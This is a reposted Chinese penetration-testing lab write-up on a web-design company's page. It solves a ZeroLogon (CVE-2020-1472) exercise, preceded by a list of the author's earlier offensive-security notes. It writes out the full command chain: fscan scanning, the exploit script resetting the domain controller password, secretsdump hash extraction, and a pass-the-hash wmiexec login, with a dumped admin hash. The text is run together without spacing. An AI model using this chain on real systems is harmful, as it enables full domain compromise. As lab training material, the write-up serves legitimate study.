尧图建网站 尧图建网站 YAOTU WEB BUILD 免费咨询
ARTICLE DETAIL

资讯详情

深耕网站建设与建站编程的一线实战洞察。

无境ZeroLogon 练习 wp

无境ZeroLogon 练习 wp 本专栏是笔者的网络安全学习笔记一面分享同时作为笔记文章目录前文链接writeup前文链接WAMP/DVWA/sqli-labs 搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描请求重发漏洞扫描等工具的使用网站信息收集及nmap的下载使用SQL注入(1)——了解成因和手工注入方法SQL注入(2)——各种注入SQL注入(3)——SQLMAPSQL注入(4)——实战SQL注入拿webshellVulnhub靶机渗透之Me and My GirlfriendXSS漏洞文件上传漏洞文件上传绕过文件包含漏洞Vulnhub靶机渗透之zico2命令执行漏洞逻辑漏洞越权访问和支付漏洞网站后台安全weevely的使用及免杀Linux中的菜刀MSF(1)——一次完整的渗透流程WebShell命令执行限制解决方案记一次艰难的SQL注入(过安全狗)MSF(2)——各种木马的生成及简单的免杀MSF(3)——apk和exe的加马(过360、火绒)通过Frp解决实现内网穿透改造冰蝎马实现免杀之default_aes php记一次简单的对盗号网站的渗透记一次幸运的漏洞挖掘记一次从外网打通AWS云内网渗透初探记对外国某服务器的内网渗透一次丝滑的内网渗透拿下域控实战内网PTH上线域控通过路由器进行内网渗透钓鱼邮件和钓鱼样本无境vulntarget-a wpwriteup目标地址是192.168.111.100挂好vpn用fscan快速扫描fscanPlus_amd64-h192.168.111.100-np域控机用zerologon直接打impackethttps://github.com/maaaaz/impacket-examples-windowsCVE-2020-1472https://github.com/dirkjanm/CVE-2020-1472python cve-2020-1472-exploit.py masterpc192.168.111.100等进度条跑完域控机密码就重置了然后用impacket工具包里的secretsdump导出hashsecretsdump.exe myd.com/masterpc$192.168.111.100 -no-pass -just-dc拿到管理员hashec0df45863a3751d56ba6df1e72f7218使用工具包里的wmiexec连上去即可wmiexec.exe myd.com/Administrator192.168.111.100-hashesaad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218flag就在根目录下moreflag.txt得到flag为48255d2fc759b14f4127fda7c5a86d89
返回列表